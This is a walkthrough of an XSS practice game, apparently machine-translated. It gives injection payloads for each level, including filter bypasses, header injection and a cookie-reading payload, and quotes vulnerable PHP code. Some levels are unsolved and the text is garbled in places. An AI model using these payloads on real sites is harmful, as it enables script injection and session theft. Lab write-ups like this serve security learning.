The way to pass XSS games

1. start

<script>alert('a')</script>

<script>alert(1)</script>

<script>confirm("Well done!")</script> <script>prompt("Well done!")</script>

 

2. Pay attention to closing

test"> <script>alert('1')</script>

test"><script>confirm("Well done!")</script> test"><script>prompt("Well done!")</script>

 

3. Angle brackets are filtered, triggered by events, and closed with single quotes

' οninput=alert`1` // ' οninput=alert`1` ' ' οnchange=alert`1` // ' οnchange=alert`1` '

' οnclick='window.alert()

 

Source: http://www.runoob.com/jsref/event-oninput.html

oninput event

Example

When the user tries to input to < input >, execute JavaScript: < input type = "text" ο ninput = "myfunction()" >

Definition and Usage

The oninput event is triggered on user input.

This event is triggered when the value of the < input > or < textarea > element changes.

Tip: this event is similar to onchange Event. The difference is that the oninput event is triggered immediately when the element value changes, and onchange is triggered when the element loses focus. Another difference is that onchange events can also act on < keygen > and < Select > elements.

 

4. Just like the third level, it's just closed and replaced with double quotation marks

" oninput=alert`1` //

 

5. Look at the source code and replace o n with O ﹣ n; SC ript with SC ﹣ ript

It means no events or script s

"> <a href="javascript:alert(/1/)">click me</a> //

Generate a jump connection

 

6. The main problem is case. You can bypass the technology with case

"> <Script>alert('handsome boy')</script> // "> <img Src=x OnError=alert('xss')> //

Why can't the fifth pass be bypassed by case? Check the source code and find that the following functions are called,

 

7. Replace common characters with null

<?php

ini_set("display_errors", 0);

$str =strtolower( $_GET["keyword"]);

$str2=str_replace("script","",$str);

$str3=str_replace("on","",$str2);

$str4=str_replace("src","",$str3);

$str5=str_replace("data","",$str4);

$str6=str_replace("href","",$str5);

echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<form action=level7.php method=GET>

<input name=keyword value="'.$str6.'">

<input type=submit name=submit value=search />

</form>

</center>';

?>

" oonninput=alert(1) "

"> <scscriptript>alert`xss`</scscriptript> //

8. Filtered: ", src, on, script, data test code:

"'%&#></script><p class="οnmοuseοver=" οnmοuseοver="xx" onxxx="">xxx</p>

<input name=keyword value="&quot;'%&amp;#&gt;&lt;/script&gt;&lt;pclass=&quot;οnmοuseοver=&quot; οnmοuseοver=&quot;xx&quot; onxxx=&quot;&quot;&gt;xxx&lt;/p&gt;">

The utilization code is: javascript:alert(1)

You can use hexadecimal conversion to bypass filtering;

javasc&#x72;ipt:alert(1)

 

9. Add the following sentence to check the validity of URL

if(false===strpos($str7,'http://'))

{
echo '<center><BR><a href="Your link is illegal? Do you have it or not?">Friendship links</a></center>';
}
javascript:alert(1) //http://

javasc&#x72;ipt:alert(1)//http://

 

10. Fi lt er "<", ">" angle bracket

Angle brackets are filtered. The first consideration is event type to trigger XSS

Look at source code

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

$str11 = $_GET["t_sort"];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<form id=search>

<input name="t_link" value="'.'" type="hidden">

<input name="t_history" value="'.'" type="hidden">

<input name="t_sort" value="'.$str33.'" type="hidden">

</form>

</center>;

?>

It is found that in addition to keyword, it also accepts the T [sort] parameter. Although keyword is not filtered, it is not related to other things...

In the future, t_sort type="hidden", so when constructing, you need to bring type="text" to display the text content

?keyword=12&t_sort="; type="text" οnclick="alert(111)

?keyword=12&t_sort="; type="text" οnmοuseοver="alert(111)

before and after comparison

 

11. Insert the Referer

 

Combined with source code

$str = $_GET["keyword"];

$str00 = $_GET["t_sort"];

$str11=$_SERVER['HTTP_REFERER'];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

...

<input name="t_ref" value="'.$str33.'" type="hidden">

You can also construct your own Referer, just like the tenth level

Referer:12&t_sort="; type="text" onclick="alert(111)

 

12. Insert user "agent

Same as 11

 

13. insert Cookie

Similarly, note that the parameter name is user, and pay attention to the closure of the constructed statement.

" type="text" οnclick="alert(111)

With F12, you can fuzz and view the received and filtered characters.

 

14. The EXIF information rendering analysis of the picture results in XSS

Check the source code and find out that an iframe page is embedded. Visit this website http://www.exifviewer.org/, which is a website for viewing EXIF information of pictures. It means that this is XSS for uploading pictures.

The website of this question has been closed;

For reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0194934.html

 

15. Angularjs ng include instruction

The correct access links for 15 are as follows;

http://127.0.0.1/xss/level15.php?src=1.gif

The ng include directive is used to contain external HTML files.

Contains content that will be a child of the specified element.

The value of the ng include property can be an expression that returns a filename.

By default, the included files need to be included in the same domain name.

'level4.php?keyword=%22%20οnfοcus=alert(1)%20%22'

The online search is this payload, but it's not successful; I haven't met this before, and I can't solve it for the time being.

 

16. Filter script, space/

Bypass with% 0d line feed

playload: <img%0Dsrc=1%0Dοnerrοr=alert(1)>

 

17. filtration >

But the input content is in the embed tag, and the < embed > tag defines the embedded content, such as plug-ins;

Using event tag to trigger, onmousedown, onfocus, etc. can be used, but I don't know why onclick can't.

playload: arg01=a&arg02=b οnfοcus=alert(1)

Both parameters.

 

18. Same as 17

arg01=a&arg02=b οnfοcus=alert(1)

My test here is the same as that of 17, but on the Internet, it says that only the first parameter takes effect, but you can't see the difference by looking at the source code of php. It seems that it's related to flash, that is, some swf files in the source code. It's too vegetable to understand.

 

19.flash xss

Reference resources: http://blog.icxun.cn/note/308.html playload: arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E

 

20. Still don't understand

playload:

arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height

Published 5 original articles, praised 0, visited 20
Private letter follow

Tags: PHP Javascript AngularJS

Posted on Thu, 12 Mar 2020 00:50:12 -0700 by andymoo